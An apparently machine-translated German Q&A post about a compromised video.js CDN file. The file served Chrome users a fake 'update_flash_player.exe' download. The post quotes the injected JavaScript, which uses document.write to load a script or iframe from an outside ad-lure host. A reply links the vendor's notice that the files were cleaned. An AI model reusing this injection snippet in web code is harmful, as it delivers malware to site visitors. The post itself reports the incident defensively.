malware update_flash_player.exe gefunden in http://vjs.zencdn.net/c/video.js?ver=3.5.1
Beim surfen einige web-Seiten mit Chrome bekam ich aufgefordert, eine Datei herunterzuladen:
- update_flash_player.exe
Kein problem mit Safari und Firefox, nur Chrome. Meine Plattform ist Mac.
Begutachtete ich den Quelltext der Seite und ich glaube, ich fand, bösartigen code in das folgende Skript:
Den code ich denke, es ist maliciuos:
if(navigator.appVersion.indexOf("MSIE")!=-1){
document.write('<script src="http://cdn.adsbarscipt.com/links/jump/"></script>');
}
if(navigator.appVersion.indexOf("Chrome")!=-1){
document.write('<iframe src="http://cdn.adsbarscipt.com/links/flash/?updnew" width="200" height="200"></iframe>');
}
Meine Frage ist: wo finde ich eine saubere version von dem script?
BEARBEITEN
Wie schon in den Kommentaren, der Autor des script gereinigt hat, ist es nun sicher.
- Ich habe umformuliert es, ist es ok? Dank
- Umformuliert es wieder, hoffe es ist klarer jetzt.
Du musst angemeldet sein, um einen Kommentar abzugeben.
Ich würde Hinzugefügt haben, können Sie diese als Kommentar, aber ich habe nicht genug Ruf.
Sieht es aus wie video.js gepostet haben ein blog über das problem:
http://blog.videojs.com/post/61309840958/unauthorized-modification-of-video-js-cdn-files
Einige Ihrer Dateien betroffen waren, aber Sie sagen, Sie haben das problem behoben jetzt.